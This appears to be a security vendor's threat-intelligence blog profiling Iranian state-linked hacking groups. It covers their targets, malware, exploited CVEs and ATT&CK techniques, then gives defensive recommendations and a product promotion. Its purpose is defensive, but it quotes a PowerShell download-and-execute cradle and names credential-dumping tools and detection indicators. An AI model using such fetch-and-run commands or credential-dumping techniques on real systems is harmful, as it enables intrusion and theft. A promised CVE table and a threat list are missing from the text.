Iranian Threat Actors: What Defenders Need to Know

Geopolitical tensions and kinetic military operations have a well-documented spillover effect into cyberspace. During periods of heightened conflict, security operations centers (SOCs) consistently observe surges in activity from state-sponsored and state-affiliated threat actors, such as increased reconnaissance, credential harvesting campaigns, spear-phishing waves, and in some cases, destructive attacks against critical infrastructure.

Iran's cyber ecosystem is one of the most active and diverse among nation-state threat actors. It comprises a broad constellation of groups operating under different organizational umbrellas, like the Islamic Revolutionary Guard Corps (IRGC), the Ministry of Intelligence and Security (MOIS), and affiliated contractors. Each threat group has its distinct toolsets, targeting profiles, and operational objectives ranging from espionage to disruption to destruction.

In this blog, we explain the most operationally relevant Iranian threat actor groups, their modus operandi, primary targets, malware arsenals, and detection opportunities.

Brief History of Iranian State-Sponsored Threat Actors

Iran's investment in offensive cyber capability accelerated dramatically following the discovery of Stuxnet in 2010, which targeted Iranian nuclear enrichment centrifuges. The attack demonstrated that cyber operations could achieve kinetic-level effects against physical infrastructure and placed Iran firmly in the posture of a nation that needed to develop serious cyber deterrence and offensive capability.

By the mid-2010s, groups now tracked as APT33, APT34, and MuddyWater had surfaced in public reporting. Iranian threat actors distinguished themselves early through an emphasis on social engineering, destructive wiper malware, and targeting of dissident communities abroad. Over time, their capabilities matured significantly from rudimentary web defacement and DDoS operations to sophisticated multi-stage intrusions, cloud-native command-and-control, and large-scale identity attacks against cloud platforms.

Today, Iranian cyber operatives are some of the most active, combining traditional espionage techniques with disruptive strategies.

Profiles of Iranian State-Sponsored Cyber Threat Actors

APT33 (Peach Sandstorm / Elfin / Magnallium / Refined Kitten)

Active Since: 2013 Attributed To: IRGC

Target Sectors & Regions: Aerospace, defense, satellite, oil and gas, energy, petrochemical, and government. Primary geographic focus on the United States, Saudi Arabia, UAE, South Korea, and Western Europe. The education sector is targeted as an infrastructure procurement vector.

Modus Operandi: APT33 has undergone a significant operational shift. Early campaigns (2013–2019) relied on spear-phishing with recruitment-themed lures, malicious HTML Application (.hta) files, and typosquatting domains impersonating companies like Boeing. Since 2023, the group's primary initial access method has shifted to large-scale password spray attacks against Microsoft 365 and Azure Active Directory (Entra ID) environments, targeting thousands of organizations globally. These attacks are conducted using the go-http-client user agent string and anonymized through TOR exit nodes.

Post-compromise, the group uses SMB for lateral movement, deploys RMM tools (AnyDesk) for persistence, and takes Active Directory snapshots using Sysinternals AD Explorer to map the environment.

A notable 2024 evolution involved the abuse of Microsoft Azure infrastructure. APT33 provisioned fraudulent Azure subscriptions (in some cases using compromised education accounts with Azure for Students entitlements) as C2 nodes, blending malicious traffic with legitimate cloud usage.

Key Malware & Tools:

• Tickler (2024): Custom multi-stage C/C++ backdoor distributed in ZIP archives using double-extension masquerading (.pdf.exe). Uses PEB traversal to locate kernel32.dll and dynamically resolve APIs, bypassing EDR API hooking. Persists via the Run registry key as SharePoint.exe. C2 is hosted on attacker-controlled Azure subscriptions.
• FalseFont (2023): Custom backdoor deployed against defense industrial base (DIB) targets following password spray compromise.
• SHAPESHIFT / STONEDRILL: Destructive wiper with in-memory injection and anti-emulation techniques. Deployed via the DROPSHOT dropper.
• TURNEDUP: Long-standing custom backdoor from early operations.
• POWERTON: PowerShell-based modular backdoor for persistent remote access.

Notable CVEs Exploited: CVE-2017-11774 (Microsoft Outlook), CVE-2018-20250 (WinRAR)

Key MITRE ATT&CK Techniques: T1078.004, T1110.003, T1059.001, T1547.001, T1021.002, T1071.001, T1567

APT34 / OilRig (Hazel Sandstorm / Helix Kitten / Earth Simnavaz / Crambus)

Active Since: 2014 Attributed To: MOIS

Target Sectors & Regions: Government (i.e., Iraq, Jordan, Lebanon, Saudi Arabia), financial services, energy, chemicals, telecommunications, oil and gas, aviation. Operations primarily in the Middle East with campaigns extending to European and U.S. targets.

Modus Operandi: APT34 is one of the most prolific and best-documented Iranian groups. It maintains one of the broadest actively developed toolsets and demonstrates a particular sophistication in C2 architecture, notably DNS tunneling, which is implemented across multiple malware families. The group conducts spear-phishing with document-based malware (malicious macros), exploits public-facing applications, and abuses legitimate cloud services as covert C2 channels.

In 2019, a threat actor using the Telegram persona "Lab Dookhtegan" publicly leaked APT34's tools, including web shell source code, implants, and victim data. The group recovered rapidly, demonstrating significant development capacity by replacing compromised tooling with new families within weeks.

Key Malware & Tools:

• SideTwist: Native backdoor supporting file upload/download and remote shell execution. Delivered via spear-phishing with macros that extract the trojan to %LOCALAPPDATA%\SystemFailureReporter\, create an update.xml activation switch, and establish persistence via a scheduled task running every five minutes.
• Saitama: DNS tunneling implant using a finite state machine (FSM) architecture. Employs A, AAAA, and TXT records with base16/base64 encoded payloads. First observed targeting Jordan's foreign ministry (2022).
• PowerExchange: Exchange server backdoor using email as a covert C2 channel logs into Exchange with stolen credentials and relays exfiltrated data as attachments through legitimate government Exchange infrastructure.
• STEALHOOK: Credential theft tool exfiltrating via Microsoft Exchange, observed alongside CVE-2024-30088 exploitation for kernel-level privilege escalation.
• SC5k / OilCheck / OilBooster / ODAgent: Family of cloud-integrated downloaders using OneDrive and Exchange Online as C2 channels.
• BONDUPDATER: DNS-based backdoor using TXT records for C2.
• Karkoff: Lightweight .NET backdoor using Exchange Web Services (EWS) for C2.
• Menorah: Evolved variant of SideTwist with enhanced evasion (2023).
• Web Shells: TwoFace, HyperShell, HighShell, RunningBee.
• Credential Tools: ValueVault, Pickpocket, credential-filter DLLs.

Notable CVEs Exploited: CVE-2017-11882, CVE-2019-0604, CVE-2024-30088

Key MITRE ATT&CK Techniques: T1071.004, T1059.001, T1053.005, T1114.002, T1567, T1505.003, T1003

APT35 / Magic Hound / Charming Kitten (Mint Sandstorm / TA453 / PHOSPHORUS)

Active Since: 2013 Attributed To: IRGC

Target Sectors & Regions: Think tanks, academic researchers (nuclear policy, Middle Eastern affairs, foreign policy), journalists, political dissidents, diplomats, government officials, human rights activists, dual nationals. Also targets U.S. critical infrastructure (seaports, energy, transit, utilities) and defense industrial base. Geographic focus on the United States, Europe, the Middle East (particularly Israel), and India.

Modus Operandi: APT35 is arguably the most publicly visible Iranian group due to its extensive and sophisticated social engineering. The group constructs elaborate fake personas on social media, impersonating journalists (including real individuals at institutions like the Brookings Institution), conference organizers, and academics. Engagements often involve weeks-long email exchanges to build rapport before introducing a malicious link or document. Recent campaigns have used GenAI to create polished malicious PDFs impersonating organizations like RAND Corporation.

Their credential harvesting infrastructure impersonates Google, Microsoft, Yahoo, and institutional login pages and is capable of intercepting MFA tokens, enabling account takeover even with MFA enabled.

Key Malware & Tools:

• POWERSTAR / CharmPower: Fully-featured modular PowerShell backdoor with remote execution, persistence management, screenshot capture, process enumeration, file search, and a cleanup module. The 2023 variant decouples the decryption key from the C2 server and retrieves C2 addresses from the decentralized IPFS filesystem for infrastructure resilience.
• BellaCiao: Custom .NET dropper with a novel C2 mechanism, each sample is individually tailored to its target with hardcoded company names, subdomains, and IP addresses. C2 operates via DNS resolution: the resolved IP's last octet encodes commands (deploy web shell, deploy Plink proxy, or remove artifacts). Immediately attempts to disable Microsoft Defender on deployment.
• GorjolEcho / NokNok: Windows PowerShell backdoor (GorjolEcho); when a target was identified as a macOS user, the group rapidly developed a Mac-native variant (NokNok) masquerading as a VPN solution.
• HYPERSCRAPE: Custom email extraction tool that systematically downloads the contents of a target's inbox.
• PowerLess: PowerShell-based implant observed in multi-tool campaigns.
• BASICSTAR / Sponsor: Additional backdoors in recent campaigns.

Notable CVEs Exploited: CVE-2021-44228 (Log4Shell), CVE-2022-47966 (Zoho ManageEngine), ProxyShell chain (CVE-2021-34473/34523/31207), ProxyLogon (CVE-2021-26855)

Key MITRE ATT&CK Techniques: T1566.001, T1566.002, T1598, T1059.001, T1071.001, T1071.004, T1102, T1114

APT42

Active Since: ~2015 Attributed To: IRGC

Target Sectors & Regions: Journalists, researchers, NGOs, members of the Iranian diaspora, government officials, dissidents. Stealthy, low-volume, narrowly scoped campaigns suggesting a focus on human intelligence collection rather than mass-scale espionage.

Modus Operandi: APT42 represents a specialized surveillance capability within the Iranian APT ecosystem. The group conducts targeted spear-phishing campaigns against individuals deemed adversarial to the regime, uses cloud-based platforms and mobile spyware, and deploys credential phishing to monitor dissident activity. Its campaigns are notably stealthy and carefully scoped, distinguishing it from the broader espionage operations of groups like APT35.

Key MITRE ATT&CK Techniques: T1566, T1598, T1102, T1114

APT39 (Remix Kitten / Chafer)

Active Since: ~2014 Attributed To: MOIS

Target Sectors & Regions: Telecommunications, travel, and IT services. Geographic focus on the Middle East, with operations extending to the United States, Europe, and Asia.

Modus Operandi: APT39 is primarily focused on personal information collection at scale, likely in support of Iranian intelligence tracking of individuals. The group uses spear-phishing and watering hole attacks for initial access, and is known for deploying modified Mimikatz variants for credential harvesting. Telecommunications targeting suggests a capability to enable surveillance of individuals through carrier-level access.

Key MITRE ATT&CK Techniques: T1566, T1071, T1003

MuddyWater (Mango Sandstorm / Seedworm / TA450 / TEMP.Zagros / Static Kitten)

Active Since: 2017 Attributed To: MOIS

Target Sectors & Regions: Government agencies, defense contractors, energy, telecommunications, financial institutions, academia. Primary focus on the Middle East (Israel, Turkey, Saudi Arabia, Jordan, Iraq, UAE), North Africa (Egypt, Sudan, Tanzania), Central/South Asia, and EMEA. Recent 2025 campaigns also targeted U.S. manufacturing and transportation.

Modus Operandi: MuddyWater is one of the most operationally active Iranian groups and is distinctive for its heavy reliance on PowerShell at every stage of the kill chain, combined with living-off-the-land binary (LOLBin) abuse of mshta.exe, regsvr32.exe, rundll32.exe, certutil.exe. The group extensively abuses legitimate Remote Monitoring and Management (RMM) tools for post-compromise access, cycling regularly between platforms.

Spear-phishing is conducted using both custom campaigns and compromised email accounts. Recent campaigns distribute links to malicious files hosted on cloud storage platforms (OneHub, Sync, Egnyte, TeraBox) using password-protected archives to evade email security scanning.

C2 Framework Evolution (chronological):

• POWERSTATS → MuddyC3 (Python 2) → PhonyC2 (Python 3, source code leaked) → MuddyC2Go(Golang) → DarkBeatC2 (current, identified early 2024)

Key Malware & Tools:

• Phoenix Backdoor (2025): Lightweight implant deployed via FakeUpdate injector. Persistence via Winlogon registry modifications.
• Custom Chromium-Based Credential Stealer (2025): Targets Chrome, Opera, Brave, and Edge. Extracts encrypted keys from Local State files, terminates browser processes, decrypts login data, and stages output to C:\Users\Public\Downloads\cobe-notes.txt.
• RMM Tool Abuse: Atera Agent, ConnectWise ScreenConnect, SimpleHelp, N-able, MeshCentral, PDQ, and Action1.
• Open-Source Tools: LaZagne, Chisel, PLink, FRP (Fast Reverse Proxy), Ligolo.

Notable CVEs Exploited: CVE-2020-1472 (Zerologon), CVE-2023-27350 (PaperCut), Exchange ProxyShell chain

Key MITRE ATT&CK Techniques: T1059.001, T1219, T1566.001, T1566.002, T1218.005, T1105, T1547.004, T1003

Agrius (Pink Sandstorm / Agonizing Serpens)

Active Since: 2020 Attributed To: MOIS

Target Sectors & Regions: Israeli organizations across education, technology, and the broader private sector. Operations are primarily destructive in intent.

Modus Operandi: Agrius represents the convergence of espionage and destructive operations. The group typically conducts data theft and exfiltration before deploying destructive payloads, maximizing both intelligence value and disruptive impact. Its defining characteristic is the deployment of wipers disguised as ransomware, a tactic that complicates initial incident triage. Responders may initially classify incidents as cybercriminal ransomware before recognizing their state-aligned, destructive nature.

Key Malware & Tools:

• Apostle: Initially deployed as a non-functional ransomware facade over a wiper. Later evolved into functional ransomware.
• Fantasy Wiper: File-level wiper targeting Israeli organizations.
• BFG Agonizer / MultiLayer Wipers: Additional wiper variants (2023).
• IPsec Helper: Custom backdoor for persistent access.
• Custom ASP.NET Web Shells: Persistent footholds on compromised web servers.

Key MITRE ATT&CK Techniques: T1485, T1486, T1505.003, T1041

Fox Kitten (Pioneer Kitten / Parisite / UNC757)

Active Since: ~2017 Attributed To: IRGC

Target Sectors & Regions: Broad targeting across technology, government, defense, healthcare, and financial sectors. Operates as an initial access broker, providing footholds to downstream Iranian groups.

Modus Operandi: Fox Kitten specializes in exploiting edge infrastructure like VPN appliances, Citrix gateways, and remote desktop solutions to establish persistent footholds in corporate networks. The group has been observed operating at the intersection of espionage and cybercrime, offering affiliates an 80% share of ransom proceeds for attacks against Iran's adversaries. It has reportedly shared or sold access to other Iranian APTs, making it a critical enabler in Iran's offensive cyber ecosystem.

Tools: SSH tunneling, Mimikatz, custom web shells, open-source post-exploitation frameworks.

Key MITRE ATT&CK Techniques: T1190, T1133, T1003, T1021

Tortoiseshell / IMPERIAL KITTEN (Crimson Sandstorm / UNC1549)

Active Since: ~2018 Attributed To: IRGC

Target Sectors & Regions: IT service providers, supply chain entities connected to defense and energy sectors in the Middle East. Also active against defense, aerospace, telecommunications, and regional government entities.

Modus Operandi: Tortoiseshell targets IT service providers and supply chain entities to pivot into higher-value organizations through trusted relationships. The group uses both custom and commodity tools, watering hole campaigns, and job-themed lures as delivery mechanisms. Some campaigns have indicated collaboration or overlap with other Iranian APT clusters.

Key Tools: IMAPLoader backdoor, SYSKIT, IMAPlibrary.

Key MITRE ATT&CK Techniques: T1195, T1566, T1071

HomeLand Justice (DEV-0270 / Nemesis Kitten)

Active Since: ~2021 Attributed To: IRGC

Target Sectors & Regions: Government agencies, critical infrastructure, public services. The most notable operation targeted Albanian government infrastructure (2022), which led to a diplomatic rupture between Albania and Iran.

Modus Operandi: HomeLand Justice combines ransomware tactics with hacktivist branding. It typically exfiltrates data before deploying encryption or wiper payloads, then leaks stolen data on dedicated websites and social media. The 2022 Albania campaign used Exchange (ProxyShell) and SharePoint for initial access, followed by deployment of three payloads: ROADSWEEP (file wiper), CHIMNEYSWEEP (information-stealing backdoor), and ZEROCLEAR (MBR wiper using EldoS RawDisk driver).

Key Malware: ROADSWEEP, CHIMNEYSWEEP, ZEROCLEAR

Key MITRE ATT&CK Techniques: T1190, T1485, T1486, T1041

CyberAv3ngers

Active Since: ~2020 Attributed To: IRGC

Target Sectors & Regions: Industrial control systems (ICS) and operational technology (OT), particularly internet-connected programmable logic controllers (PLCs) and human-machine interfaces (HMIs). Gained attention for targeting U.S. water and wastewater infrastructure.

Modus Operandi: CyberAv3ngers blurs the line between hacktivist activism and state-sponsored operations. The group focuses on Unitronics Vision Series PLCs with default credentials, targeting OT environments that are often less well-monitored than IT networks. Public messaging and timing align closely with Iranian geopolitical interests.

Key MITRE ATT&CK Techniques: T1078, T1059, T0810, T0866

Moses Staff / Abraham's Ax

Active Since: 2021 Attributed To: IRGC

Target Sectors & Regions: Primarily Israeli public and private sector entities.

Modus Operandi: Moses Staff targets Israeli organizations with a mix of data theft, encryption, and ideological propaganda. The group publishes victim information and inflammatory statements via Telegram and other channels, making cyber-enabled influence operations a core component of its activity. Abraham's Ax is assessed as a secondary persona for the same operational group, used for specific campaigns.

Key Tools: DCSrv wiper, StrifeWater RAT, PyDCrypt

DEV-1084

Active Since: ~2022 Attributed To: Iranian nexus

Target Sectors & Regions: Organizations across multiple sectors, particularly those with significant cloud presence.

Modus Operandi: DEV-1084 is notable for conducting highly destructive post-compromise operations. Following initial access (often provided by Fox Kitten), the group performs large-scale destruction of cloud resources, such as deleting virtual machines, storage accounts, and virtual networks, causing maximum operational disruption. This model of initial access brokering combined with destructive follow-on operations illustrates the modular, collaborative nature of Iran's cyber ecosystem.

Emennet Pasargad

Active Since: ~2018 Attributed To: IRGC

Target Sectors & Regions: U.S. and Israeli election infrastructure, media organizations, and entities related to political processes.

Modus Operandi: Emennet Pasargad is primarily known for cyber-enabled influence operations targeting elections and public discourse. The group has conducted hack-and-leak operations, website defacements, and distributed fabricated content to influence public perception. OFAC has designated the group for its interference activities.

GreenCharlie

Active Since: ~2023 (public reporting) Attributed To: Iranian nexus

Target Sectors & Regions: Regional governments and defense sectors in the Middle East.

Modus Operandi: GreenCharlie is a relatively newer cluster in public reporting. Available evidence suggests it conducts cyber espionage aligned with Iranian state interests. Campaigns appear focused on targeted intrusions against government and defense organizations. Attribution analysis is still ongoing across vendors.

DarkHydrus

Active Since: ~2016 Attributed To: Iranian nexus

Target Sectors & Regions: Government agencies and educational institutions in the Middle East.

Modus Operandi: DarkHydrus is known for its use of open-source red team tools and DNS tunneling for C2 communication. The group leverages phishing with malicious Office documents and has used the RogueRobin implant, which communicates via DNS TXT records. Overlaps with OilRig in infrastructure and techniques have been noted by researchers.

Hexane (Lyceum / Siamesekitten)

Active Since: ~2017 Attributed To: MOIS

Target Sectors & Regions: Oil and gas, telecommunications, and internet service providers primarily in the Middle East and Africa.

Modus Operandi: Hexane/Lyceum targets critical infrastructure providers with a focus on telecommunications and energy. Initial access relies on spear-phishing with malicious documents. Post-compromise activity includes credential harvesting and DNS tunneling for C2. The group's targeting of ISPs and telcos suggests an interest in enabling downstream surveillance capabilities.

MalKamak

Active Since: ~2018 Attributed To: Iranian nexus

Target Sectors & Regions: Aerospace and telecommunications sectors primarily in the Middle East, Europe, Russia, and the United States.

Modus Operandi: MalKamak conducts targeted espionage operations and is notable for the ShellClient RAT, which uses Dropbox as a C2 channel consistent with the broader Iranian APT trend of abusing legitimate cloud services. The group maintains a low operational profile and conducts infrequent but carefully targeted intrusions.

xHunt

Active Since: ~2018 Attributed To: Iranian nexus

Target Sectors & Regions: Kuwaiti government and shipping/transportation organizations.

Modus Operandi: xHunt targets Kuwaiti entities using tools that communicate via DNS tunneling and email-based C2. The group uses custom tools, including BumbleBee (DNS tunneling) and EYE (email-based backdoor), with C2 traffic designed to blend with normal organizational communications.

UNC3890

Active Since: ~2020 Attributed To: Iranian nexus

Target Sectors & Regions: Israeli organizations across shipping, government, energy, aviation, and healthcare.

Modus Operandi: UNC3890 uses watering hole attacks and spear-phishing to target Israeli entities. The group deploys two primary tools: SUGARUSH (small backdoor) and SUGARDUMP (credential harvesting tool targeting browser-stored credentials). Lures have included fake job postings and shipping/logistics-themed content tailored to the Israeli market.

Cross-Group Technical Analysis of Iranian APT Groups

Initial Access

• Spearphishing remains the most common vector. Document-based chains typically follow the pattern: malicious macro → encoded PowerShell download cradle → payload retrieval from cloud hosting or attacker infrastructure. APT35 and APT34 construct elaborate multi-stage social engineering sequences; MuddyWater favors direct delivery of RMM agent installers in password-protected archives.
• Password Spraying has become APT33's primary initial access method since 2023, targeting Microsoft 365 and Entra ID at scale using go-http-client through TOR exit nodes.
• Supply Chain Compromise: MuddyWater compromised the Israeli IT provider "Rashim" to gain access to downstream organizations. Fox Kitten targets VPN appliances and MSPs for initial footholds.
• Exploitation of Public-Facing Applications is rapid and consistent across groups. The table below summarizes key CVEs:

Execution & Persistence

PowerShell is the single most common execution engine across all Iranian groups. Techniques include encoded commands (-EncodedCommand), download cradles (IEX (New-Object Net.WebClient).DownloadString()), and custom PowerShell backdoors. MuddyWater treats PowerShell as a foundational capability at every kill chain stage.

LOLBin Abuse: Commonly abused binaries include mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe for execution, defense evasion, and payload delivery.

Persistence Mechanisms:

• Scheduled tasks (APT34's SystemFailureReporter pattern runs every 5 minutes)
• Registry Run keys (APT33's SharePoint.exe, MuddyWater's Winlogon Helper DLL modifications)
• Windows services and DLL side-loading
• IIS modules (APT35 deploying modules for instruction processing and exfiltration)

Command & Control

• DNS Tunneling: APT34's signature technique, implemented across BONDUPDATER, Saitama, and other tools using A, AAAA, TXT, and MX records with base16/base64 encoded payloads. DarkHydrus and xHunt also leverage DNS tunneling.
• Cloud Service Abuse: An accelerating trend across all major groups. APT34 uses OneDrive and Exchange Online; APT35 leverages Dropbox, Google Drive, Backblaze, and IPFS; MuddyWater abuses Telegram API and cloud storage platforms; APT33 abuses Azure infrastructure directly. MalKamak uses Dropbox. This technique exploits the implicit trust organizations place in cloud service traffic.
• Custom C2 Frameworks: MuddyWater operates the most sophisticated custom C2 ecosystem: POWERSTATS → MuddyC3 → PhonyC2 → MuddyC2Go → DarkBeatC2.

Credential Access

• LSASS Dumping: Mimikatz, comsvcs.dll, MiniDump, ProcDump. APT39 uses modified Mimikatz variants.
• Kerberoasting / AS-REP Roasting: APT33 and APT34 post-compromise activity.
• Browser Credential Theft: MuddyWater's custom Chromium-based stealer targets Chrome, Opera, Brave, and Edge.
• MFA Token Interception: APT35's credential harvesting kits intercept MFA codes, enabling account takeover despite MFA enablement.
• Exchange-Based Exfiltration: APT34's STEALHOOK and PowerExchange use Exchange as both a credential store and exfiltration channel.

Prioritized Defensive Actions Against Iranian APT Groups

Based on observed TTP frequency across Iranian threat groups, the following defensive actions are advised.

1. Enforce phishing-resistant MFA on all externally-facing services. Use FIDO2/hardware keys for high-value accounts. Monitor Entra ID sign-in logs for password spray patterns (high failure volume, go-http-client user agent, TOR exit node IPs).
2. Patch internet-facing appliances within 48 hours of critical vulnerability disclosure. Exchange, VPN gateways, Citrix, ManageEngine, and PaperCut are consistent targets.
3. Enable comprehensive PowerShell logging, such as Script Block Logging (Event ID 4104), Module Logging, and Transcription Logging. Deploy behavioral detections for suspicious PowerShell patterns. This provides coverage across virtually all Iranian threat clusters.
4. Monitor for unauthorized RMM tool installation, particularly AnyDesk, ScreenConnect, SimpleHelp, MeshCentral, and Action1 spawned from PowerShell, cmd, or mshta parent processes.
5. Implement DNS query logging and anomaly detection to flag high volumes of TXT/MX record queries, elevated subdomain entropy, and unusual DNS beaconing intervals.
6. Harden Active Directory against credential theft, enable LSASS protection (PPL), deploy Kerberoasting detection, and audit Mimikatz-indicative access patterns (GrantedAccess: 0x1010, 0x1410, 0x1438).
7. Audit Azure/M365 subscription and resource provisioning unauthorized Azure subscription creation is an APT33 tradecraft indicator.
8. Educate high-risk users, like researchers, policy experts, journalists, executives, and dual nationals, who are disproportionately targeted by APT35 and APT42 social engineering. Awareness of long-horizon rapport-building tactics is critical.
9. Treat ransomware in targeted sectors as a potential wiper, always preserve forensic evidence, and validate data integrity before assuming criminal ransomware intent.
10. Inventory and monitor internet-facing OT/ICS devices. CyberAv3ngers targets PLCs with default credentials. Remove default credentials and segment OT networks from internet exposure.

How Picus Helps Simulate Iranian APT Attacks?

We also strongly suggest simulating the Iranian APT attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against other APT attacks, such as Lazarus, Salt Typhoon, and Fancy Bear, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Iranian APT groups:

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial  of the Picus Security Validation Platform.